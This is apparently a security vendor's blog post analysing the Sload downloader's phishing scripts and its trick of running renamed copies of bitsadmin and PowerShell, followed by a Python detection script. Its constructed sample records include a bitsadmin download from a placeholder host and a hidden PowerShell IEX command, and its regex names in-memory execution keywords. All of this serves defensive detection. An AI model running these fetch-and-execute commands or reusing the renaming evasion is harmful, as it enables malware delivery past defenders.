Sload (also known as Starslord loader) is one of the most dangerous malware strains of recent years. It usually functions as a downloader: rather than a self-contained payload, it is a first-stage component that collects information about the infected device and exfiltrates it, so the operators can assess the target and drop a more significant payload if the victim looks profitable. Mainly targeting Europe, Sload has been in active use since at least 2018, with multiple vendors reporting attacks on targets in the UK and Italy. The malware's developer(s) have taken an unusual approach: instead of using an executable or a malicious document to infiltrate machines, they use scripts native to Windows, such as VBS and PowerShell, as the initial foothold, tricking users into executing them via spear phishing.
The downloader is actively developed and has gone through several iterations; its creator keeps changing the first-stage script while the main module remains more or less constant. The first reports of this malware describe a rogue LNK file (a Windows shortcut) that downloads a PowerShell script, which in turn downloads and executes Sload. Later variants begin with obfuscated WSF/VBS scripts that are frequently mutated to evade AV detection. The initial script used in these attacks repeatedly scores low on VirusTotal and is designed to slip past more advanced security tools such as EDRs.
Minerva Labs has seen Sload infections originating from Italian endpoints this year, consistent with the information in this tweet. The script we encountered is an obfuscated WSF script that decodes a set of malicious commands; once executed, it stealthily downloads a remote payload and runs it in memory. The evasion technique is simple: the script copies legitimate Windows binaries under new names. Both bitsadmin.exe and powershell.exe are copied and renamed; the former is used to download a malicious PowerShell script and the latter loads it into memory and begins its execution, so a defender watching for the familiar process names sees neither.
The decoded commands (commented by us):
The obfuscated WSF Script:
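The renamed-copy trick described above is easy to catch if you look past the on-disk file name. Copying bitsadmin.exe or powershell.exe does not change the PE version resource, so a Sysmon process-creation event (Event ID 1) still carries the Microsoft OriginalFileName for the copy. The following is an added example written for this post, not Minerva's code or anything from the Sload script itself: it runs a few detection rules over constructed Sysmon-style records that mimic the chain (script host spawns a renamed bitsadmin to fetch a script, then a renamed powershell runs it in memory). The file names, paths and URL are placeholders, not indicators from the incident.

```python
import re

# Constructed Sysmon-style process-creation (Event ID 1) records, not real
# telemetry from the incident. Paths, file names and the URL are placeholders.
SAMPLE_EVENTS = [
    # Benign: the real bitsadmin run by an admin from its normal location.
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bitsadmin /list"},
    # Stage 1 of the chain: a copy of bitsadmin.exe under a new name, spawned
    # by the WSF script host, fetching a PowerShell script from a URL.
    {"Image": r"C:\Users\Public\dl.exe",
     "OriginalFileName": "bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"dl.exe /transfer job /download /priority high "
                    r"https://example.invalid/s.ps1 C:\Users\Public\s.txt"},
    # Stage 2: a renamed copy of powershell.exe executing the download in memory.
    {"Image": r"C:\Users\Public\ps.exe",
     "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'ps.exe -nop -w hidden -c "IEX (Get-Content C:\Users\Public\s.txt -Raw)"'},
    # Benign: PowerShell from its normal location running an admin script.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

LOLBINS = {"bitsadmin.exe", "powershell.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
BITS_DOWNLOAD = re.compile(r"/transfer\b.*\bhttps?://", re.IGNORECASE)
PS_IN_MEMORY = re.compile(
    r"\b(iex|invoke-expression|downloadstring|frombase64string)\b"
    r"|\s-e(nc(odedcommand)?)?\s",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list[str]:
    """Return a list of human-readable findings for one process-creation event."""
    findings = []
    image = basename(event["Image"])
    original = event.get("OriginalFileName", "").lower()
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")

    # Renaming changes the on-disk name but not the PE version resource, so
    # OriginalFileName still identifies which Microsoft binary this really is.
    if original in LOLBINS and image != original:
        findings.append(f"renamed {original} running as {image}")
    # Windows Script Host spawning bitsadmin/powershell matches the WSF first stage.
    if original in LOLBINS and parent in SCRIPT_HOSTS:
        findings.append(f"{original} spawned by script host {parent}")
    if original == "bitsadmin.exe" and BITS_DOWNLOAD.search(cmd):
        findings.append("bitsadmin used to download from a URL")
    if original == "powershell.exe" and PS_IN_MEMORY.search(cmd):
        findings.append("powershell in-memory execution pattern")
    return findings


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events with at least one finding."""
    return {i: f for i, e in enumerate(events) if (f := analyze(e))}


if __name__ == "__main__":
    for i, findings in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["Image"])
        for f in findings:
            print("   -", f)
```

The two benign records produce no findings; the two staged records each trip three rules, which is the kind of stacking you want before paging anyone. An attacker could patch the version resource of the copy to defeat the OriginalFileName check, but that also invalidates the Authenticode signature on the copy, so pairing this rule with a "Signed = false for a file claiming a Microsoft OriginalFileName" check closes that gap.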
The final payload of this downloader varies, but it has been reported to drop the Ramnit and Trickbot banking trojans, both highly dangerous malware families whose infections can ultimately lead to ransomware. Minerva prevents Sload and its subsequent payloads: